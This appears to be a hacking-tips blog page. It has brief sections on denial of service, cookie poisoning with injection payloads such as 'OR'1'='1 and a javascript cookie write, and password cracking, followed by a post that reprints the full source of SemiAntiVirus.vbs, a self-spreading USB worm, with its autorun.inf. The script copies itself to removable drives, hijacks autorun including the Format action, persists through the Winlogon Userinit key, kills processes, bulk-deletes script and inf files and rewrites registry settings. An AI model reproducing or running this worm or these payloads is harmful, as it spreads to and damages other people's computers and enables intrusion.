A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking.
For more information on DDoS Attack, click here to view the article
For more information on DDoS Attack, click here to view the article
Cookie Poisoning:
Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection Both have 'OR'1'='1 or maybe '1'='1' But in cookie poisoning you begin with alerting your cookies Javascript:alert(document.cookie)
Then you will perharps see
"username=JohnDoe" and "password=iloveJaneDoe"
in this case the cookie poisoning could be:
Javascript:void(document.cookie="username='OR'1'='1");
Password Cracking:
Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it. You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.
Saturday, February 15, 2014
SemiAntiVirus.vbs, the VB code that went viral around 4-5 years back !
Here is the script if any one is interested.
This is the auto run file
[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=
Note: Now you cannot be assured that formatting an affected USB drive is a safe way to get rid of viruses etc. For example, this virus gets into the computer in 5 methods as the above code suggests
1.Opening
2. Using Autoplay feature
3. Exploring(right click and select explore)
4.Searching for the files saved in the USB drive
5. formatting
Interesting!!
The actual virus script which can be found in c:windows\system32\semiantivirus.vbs
To tell the truth, i do not understand a single line of this coding(except the italicized part which has a good sense of humor) but hope it would help the computer geeks in finding a solution
Important: please do not use this information for unethical purposes
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.
'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe
'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
crvbs SystemDir,"SemiAntiVirus.vbs"
Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"
Count=Drv.DriveType
Do
delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next
if Count <> 1 then
Wscript.sleep 2000
end if
loop while Count<>1
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub
sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub
sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
End sub
Subscribe to:
Posts (Atom)
Posts
